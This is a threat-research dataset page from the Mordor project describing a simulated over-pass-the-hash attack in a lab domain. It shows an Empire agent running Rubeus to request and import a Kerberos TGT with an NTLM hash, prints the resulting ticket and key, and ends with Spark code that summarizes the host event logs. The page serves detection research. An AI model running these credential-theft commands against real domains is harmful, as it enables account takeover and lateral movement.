Rubeus Elevated ASKTGT CreateNetOnly¶
Metadata¶
Author |
Roberto Rodriguez @Cyb3rWard0g |
Creation Date |
2019/03/19 |
Modification Date |
2020/09/21 |
Tactics |
[‘TA0006’] |
Techniques |
[‘T1003.003’] |
Tags |
[‘Over-Pass-The-Hash’, ‘Not Touching LSASS’] |
Dataset Description¶
This dataset represents adversaries crafting raw AS-REQ (TGT request) traffic for a specific user and encryption key (/rc4, /aes128, /aes256, or /des) to request TGTs without touching lsass.
Datasets Downloads¶
Dataset Type |
Link |
|---|---|
Host |
|
Network |
Adversary View¶
(Empire: G6BYHU4F) > shell C:\users\sbeavers\Desktop\Rubeus.exe asktgt /user:pgustavo /rc4:81d310fa34e6a56a31145445891bb7b8 /createnetonly:C:\Windows\System32\cmd.exe
[*] Tasked 4EH9PC5S to run TASK_SHELL
[*] Agent 4EH9PC5S tasked with task ID 4
(Empire: 4EH9PC5S) >
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v1.5.0
[*] Action: Ask TGT
[*] Showing process : False
[+] Process : 'C:\Windows\System32\cmd.exe' successfully created with LOGON_TYPE = 9
[+] ProcessID : 10064
[+] LUID : 0x42e7ba4
[*] Using rc4_hmac hash: 81d310fa34e6a56a31145445891bb7b8
[*] Target LUID : 70155172
[*] Building AS-REQ (w/ preauth) for: 'theshire.local\pgustavo'
[+] TGT request successful!
[*] base64(ticket.kirbi):
doIFPjCCBTqgAwIBBaEDAgEWooIETTCCBElhggRFMIIEQaADAgEFoRAbDlRIRVNISVJFLkxPQ0FMoiMw
IaADAgECoRowGBsGa3JidGd0Gw50aGVzaGlyZS5sb2NhbKOCBAEwggP9oAMCARKhAwIBAqKCA+8EggPr
UHw92ESRb2uzf7C3GBZL2lN1UdDFIhvklZB/K21vINZO3G+ExWvoUxSVQQ+vYABaHcPGGeuYhXxRTwZB
kPGYa0cFXtMSdSvXCGWVLz6LFPTco3puJNx4d0exgnjTBUp3MUQMw8x2CACCL9Cv0RYN+Wy4WLTzIF0t
StYJk0I6g+vob7jOOAE6h8wp3XDfArkfcGndJmzBAgx5IeAL10yYArod69MykefCt3/uIbNJ9waMhov4
cUInkStzt0QcFTZbvNgC30Dhew3jkzRBd5XxCHGMWkhY60ibhvfw5czUgAJ8VcsKfG+X1zkwIGRXxRhc
c8COT4Z9614twkwjQ50FiRIxZBWHkxAKvzrwDtVE5v2alwfy827Sse85RoXPebKH11RMy8vFyPKsz4F8
46Wv5F0wXPf1vEl5z99KatYf+DtBpYg+ZO7S6pT9Ov/dRkdKMBCNp/hCuiL4imjlpMaMoqiXaWSA0E61
8ihQGj/qHXns2u4vujlrx/lvxgf/uCqanH5MYBviyFyvVDeuYw5yHQ0LXaf9aOcnOg3XnwJJfks/u+FZ
FjDnfvubv1nNaPQ9QtzM2P5Y3U6/14a4Ks6XNocwWBbtAOXZ0ttzs+W1S7sXjSuPlZ3uye4yLMEV+u3h
BwFoAQVl7usydsTx8Cur3FZQagYbdnJt6wOk5MtR7AlJvZ9WwJ6AOsaTFRyQ7rrHN6kFQklPELMCV7Dl
5bR79T31hC7wEQ/eFWMuL9EeurCD20mhoDQCqLttEetwEi7R8LXE/shPKZNY/4cFhWtODbtUzMLzNo3W
pvxOPNce0dB4lv8frBVFqumyMDKxcDkjEZv7uQaMH+ofWaAPARnRSzYSK+Bf8ECJTg4Cz5aHp4Mz6rJb
1UcyQ1KyS150j0L/bIGfXr6u+CDKCvQ8w+h8p0gfqaqiNOyVfVdrHxxqcfnxrTOBoxNXwm02PomiGoH9
T/uFchWCsM7OyCe1v05QT3jSi5Z2yHBmFWHLei96zm4Vu7JRkcQukE79q4Tb4OdiKuub0TByaDSAkC7a
sd4QWyOew6gfbfJmAMkFAJnnAtIObcbeXBM/++sK1kpbs7fOVkCZP3w5arGsaY0zwwU9o/amWWalGrNd
4jZq1xRJau7zwANNKTpEmXm10LGtdODlTpUfYSJTne97WzUBFLLMvUOMsVOeotm11qflE/BXU/MVmPJa
7aaOEtApZHcHhQb+/u55SmrHXs1NQGtFsbBKotR7miHsOUqjhRBOmbjXEz8St4MoHqf7aJcIy20IoW8Q
ASNHJSJHuDLJ5j+Wf+x0pV9dl03ocbaxWvtNzNw8drbo8bh2EWJmA9BdsKOB3DCB2aADAgEAooHRBIHO
fYHLMIHIoIHFMIHCMIG/oBswGaADAgEXoRIEEE6gkql0M63etr3rDe/EiAyhEBsOVEhFU0hJUkUuTE9D
QUyiFTAToAMCAQGhDDAKGwhwZ3VzdGF2b6MHAwUAQOEAAKURGA8yMDIwMDkyMjAzMDMwN1qmERgPMjAy
MDA5MjIxMzAzMDdapxEYDzIwMjAwOTI5MDMwMzA3WqgQGw5USEVTSElSRS5MT0NBTKkjMCGgAwIBAqEa
MBgbBmtyYnRndBsOdGhlc2hpcmUubG9jYWw=
[*] Target LUID: 0x42e7ba4
[+] Ticket successfully imported!
ServiceName : krbtgt/theshire.local
ServiceRealm : THESHIRE.LOCAL
UserName : pgustavo
UserRealm : THESHIRE.LOCAL
StartTime : 9/21/2020 11:03:07 PM
EndTime : 9/22/2020 9:03:07 AM
RenewTill : 9/28/2020 11:03:07 PM
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType : rc4_hmac
Base64(key) : TqCSqXQzrd62vesN78SIDA==
..Command execution completed.
(Empire: 4EH9PC5S) >
Explore Mordor Dataset¶
Initialize Analytics Engine¶
from openhunt.mordorutils import *
spark = get_spark()
Download & Process Mordor File¶
mordor_file = "https://raw.githubusercontent.com/OTRF/mordor/master/datasets/small/windows/credential_access/host/empire_shell_rubeus_asktgt_createnetonly.zip"
registerMordorSQLTable(spark, mordor_file, "mordorTable")
[+] Processing a Spark DataFrame..
[+] DataFrame Returned !
[+] Temporary SparkSQL View: mordorTable
Get to know your data¶
df = spark.sql(
'''
SELECT Hostname,Channel,EventID, Count(*) as count
FROM mordorTable
GROUP BY Hostname,Channel,EventID
ORDER BY count DESC
'''
)
df.show(truncate=False)
+---------------------------+----------------------------------------+-------+-----+
|Hostname |Channel |EventID|count|
+---------------------------+----------------------------------------+-------+-----+
|WORKSTATION6.theshire.local|Microsoft-Windows-Sysmon/Operational |7 |526 |
|WORKSTATION6.theshire.local|Microsoft-Windows-Sysmon/Operational |12 |394 |
|WORKSTATION6.theshire.local|Microsoft-Windows-Sysmon/Operational |10 |353 |
|WORKSTATION6.theshire.local|Microsoft-Windows-Sysmon/Operational |13 |284 |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational |10 |226 |
|WORKSTATION6.theshire.local|security |4703 |214 |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational |12 |175 |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational |7 |169 |
|WORKSTATION6 |Windows PowerShell |800 |151 |
|WORKSTATION6.theshire.local|Microsoft-Windows-PowerShell/Operational|4103 |129 |
|WORKSTATION6.theshire.local|Microsoft-Windows-Sysmon/Operational |18 |103 |
|WORKSTATION5.theshire.local|security |4703 |87 |
|WORKSTATION6.theshire.local|security |4658 |64 |
|WORKSTATION5.theshire.local|security |4658 |62 |
|WORKSTATION5.theshire.local|security |4656 |52 |
|MORDORDC.theshire.local |Security |5156 |44 |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational |13 |43 |
|MORDORDC.theshire.local |Security |5158 |34 |
|WORKSTATION6.theshire.local|security |4656 |32 |
|WORKSTATION6.theshire.local|security |4690 |32 |
+---------------------------+----------------------------------------+-------+-----+
only showing top 20 rows